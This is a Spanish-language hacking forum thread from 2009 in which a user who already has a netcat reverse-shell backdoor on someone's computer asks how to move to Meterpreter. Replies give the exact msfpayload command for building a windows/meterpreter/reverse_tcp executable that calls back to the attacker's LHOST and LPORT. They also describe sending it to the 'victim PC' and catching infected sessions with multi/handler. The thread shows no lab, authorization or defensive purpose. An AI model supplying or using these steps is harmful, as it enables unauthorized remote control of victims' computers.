Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: R007h en 29 Diciembre 2009, 19:59 PM

Título: Duda con Meterpreter.
Publicado por: R007h en 29 Diciembre 2009, 19:59 PM
Hola,

bueno, resulta que tengo un equipo backdooreado con netcat.. que hace un reverseShell a mi maquina...
ahora quiero pasarle el meterpreter xD pero no c como...

puedo usar la conexion que me da netcat para enviar el payload a traves de msf?
o debo generar el payload metsvc y subirlo de algun modo a la maquina remota y despues ejecutarlo? (la maquina remota esta detras de un router asi que supongo que debe ser el windows/metsvc_reverse_tcp)

intenté generar el payload windows/metsvc_reverse_tcp pero... donde rayos queda el payload generado?
es un ejecutable que le puedo pasar a la victima?

Graxias de antemano
Salu2
Título: Re: Duda con Meterpreter.
Publicado por: Shell Root en 29 Diciembre 2009, 20:13 PM
A ver:

De está forma:
Código [Seleccionar]
./msfpayload [PAYLOAD] [<Parametros del PAYLOAD>] [Parametros de creacion del PAYLOAD X= Ejecutable] > [RUTA_DE_CREACIÓN_DEL_ARCHIVO]


Ejemplo:
Código [Seleccionar]
./msfpayload windows/meterpreter/reverse_tcp LHOST=[IP_LOCAL] LPORT=[PUERTO_LOCAL] X > /home/Meterpreter.exe

Ahora tenemos un ejecutable llamado Meterpreter.exe, enviamos esto a P.C Victima. Despues de ello, abrimos el Metasploit y lanzamos el Auxiliar multi/handler. Dentro de está "consola" debemos especificar el PAYLOAD utilizado en el Ejecutable, e ingresar de nuevo el LPORT y LHOST. Ahora estamos listo de ejecutar el Auxiliar multi/handler con el comando exploit y veremos las sessiones del Meterpreter en las P.C Infectadas por el Ejecutable que creamos.

Nota: No sé porque en el PUTO W1nd0w$! no funciona le creación de los PAYLOAD en ejecutables, no funka el parametro X >. Así que creo que tendrias que usar esto dentro de un entorno Linux.
Título: Re: Duda con Meterpreter.
Publicado por: R007h en 29 Diciembre 2009, 20:46 PM
grax alex19910218, eso es perfecto..

hey, lo unico que debo hacer en linux es el ejecutable correcto?
luego lo puedo utilizar en un win cierto?

grax..
salu2
Título: Re: Duda con Meterpreter.
Publicado por: Shell Root en 29 Diciembre 2009, 20:57 PM
Cita de: L3F3RR37R4 en 29 Diciembre 2009, 20:46 PMhey, lo unico que debo hacer en linux es el ejecutable correcto?
luego lo puedo utilizar en un win cierto?
Simon! :P No podes ejecutar el .EXE en Linux :P
Título: Re: Duda con Meterpreter.
Publicado por: R007h en 29 Diciembre 2009, 21:42 PM
jajja, obvio, no, merefiero a que el uso del multi/handler en msf lo puedo hacer desde win?
Título: Re: Duda con Meterpreter.
Publicado por: Shell Root en 29 Diciembre 2009, 21:47 PM
Cita de: L3F3RR37R4 en 29 Diciembre 2009, 21:42 PMel uso del multi/handler en msf lo puedo hacer desde win?
Simon!, es el mismo Metasploit! Solo cambia el S.O :P
Título: Re: Duda con Meterpreter.
Publicado por: Shell Root en 30 Diciembre 2009, 02:44 AM
Podes ver un ejemplo aquí http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html
Sólo texto | Texto con Imágenes